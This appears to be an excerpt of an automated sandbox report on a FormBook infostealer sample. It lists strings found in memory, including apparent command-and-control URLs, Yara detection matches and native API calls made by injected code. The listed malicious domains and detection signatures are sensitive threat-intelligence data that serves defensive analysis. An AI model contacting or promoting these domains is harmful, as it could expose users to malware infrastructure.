Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jwoalhbn.xyzReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mariaslakedistrict.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mariaslakedistrict.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mariaslakedistrict.com/gy15/www.oiupa.xyz
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mariaslakedistrict.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.midsouthhealthcare.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.midsouthhealthcare.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.midsouthhealthcare.com/gy15/www.286live.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.midsouthhealthcare.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oiupa.xyz
Source: explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oiupa.xyz/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.oiupa.xyzReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rs-alohafactorysaleuua.shop
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rs-alohafactorysaleuua.shop/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rs-alohafactorysaleuua.shop/gy15/www.tqqft8l5.xyz
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rs-alohafactorysaleuua.shopReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tqqft8l5.xyz
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tqqft8l5.xyz/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tqqft8l5.xyz/gy15/www.jwoalhbn.xyz
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tqqft8l5.xyzReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ttyijlaw.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ttyijlaw.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ttyijlaw.com/gy15/www.incrediblyxb.christmas
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ttyijlaw.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vivehogar.net
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vivehogar.net/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vivehogar.net/gy15/www.insurancebygarry.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vivehogar.netReferer:
Source: explorer.exe, 00000009.00000003.2979149239.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2154297535.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000009.00000000.2160546176.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/I
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000009.00000002.4574919373.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000009.00000002.4574919373.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: explorer.exe, 00000009.00000000.2160546176.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2980826713.000000000C086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com-
Source: explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: explorer.exe, 00000009.00000000.2160546176.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2980826713.000000000C086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.come
Source: explorer.exe, 00000009.00000000.2160546176.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comEMd
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000003.2979149239.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2154297535.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075211732.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/e
Source: explorer.exe, 00000009.00000000.2160546176.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4585832001.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2980826713.000000000C086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comM
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4574919373.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000009.00000000.2144214441.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4575826634.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3075373862.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.4589368880.000000000E3AE000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe PID: 6316, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: KfYvtUBOq.exe PID: 3360, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: Process Memory Space: RegSvcs.exe PID: 5224, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 3236, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Contains functionality to call native functions

Source: C:\Windows\explorer.exe	Code function: 9_2_0E396232 NtCreateFile,	9_2_0E396232
Source: C:\Windows\explorer.exe	Code function: 9_2_0E397E12 NtProtectVirtualMemory,	9_2_0E397E12
Source: C:\Windows\explorer.exe	Code function: 9_2_0E397E0A NtProtectVirtualMemory,	9_2_0E397E0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A370 NtCreateFile,	13_2_0041A370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A420 NtReadFile,	13_2_0041A420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A4A0 NtClose,	13_2_0041A4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A550 NtAllocateVirtualMemory,	13_2_0041A550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A41C NtReadFile,	13_2_0041A41C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041A49A NtClose,	13_2_0041A49A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_01282B60 NtClose,LdrInitializeThunk,	13_2_01282B60
